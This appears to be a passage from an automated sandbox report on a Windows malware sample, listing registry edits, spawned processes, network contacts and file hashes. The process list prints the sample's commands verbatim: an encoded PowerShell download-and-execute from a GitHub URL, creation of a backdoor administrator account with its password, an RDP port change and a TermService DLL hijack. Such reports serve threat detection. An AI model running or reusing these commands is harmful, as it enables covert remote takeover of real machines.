| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ioi34byk.iwq.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D2.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vaeiksoi.ivg.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8591.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85B1.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85C2.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D3.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4730.tmp" "c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 6B1GhkZz /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 6B1GhkZz /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 6B1GhkZz /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 6B1GhkZz
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 6B1GhkZz
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 6B1GhkZz
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | platform.wondershare.com | udp |
| N/A | 47.91.67.36:80 | platform.wondershare.com | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | www.speedtest.net | udp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:443 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | c.speedtest.net | udp |
| N/A | 151.101.2.219:443 | c.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.kabeltex.nl | udp |
| N/A | 82.151.33.2:8080 | speedtest.kabeltex.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.zeelandnet.nl | udp |
| N/A | 212.115.192.180:8080 | speedtest.zeelandnet.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.caiw.net | udp |
| N/A | 62.45.44.26:8080 | speedtest.caiw.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.worldstream.nl | udp |
| N/A | 185.182.195.78:8080 | speedtest.worldstream.nl | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/1868-114-0x0000000000680000-0x0000000000681000-memory.dmp
memory/1868-116-0x000000001B9F0000-0x000000001B9F2000-memory.dmp
memory/3160-117-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/3160-120-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
memory/3160-122-0x0000000005B10000-0x0000000005B41000-memory.dmp
memory/3160-123-0x0000000001A30000-0x0000000001A31000-memory.dmp
memory/988-125-0x0000000000000000-mapping.dmp
memory/3420-124-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
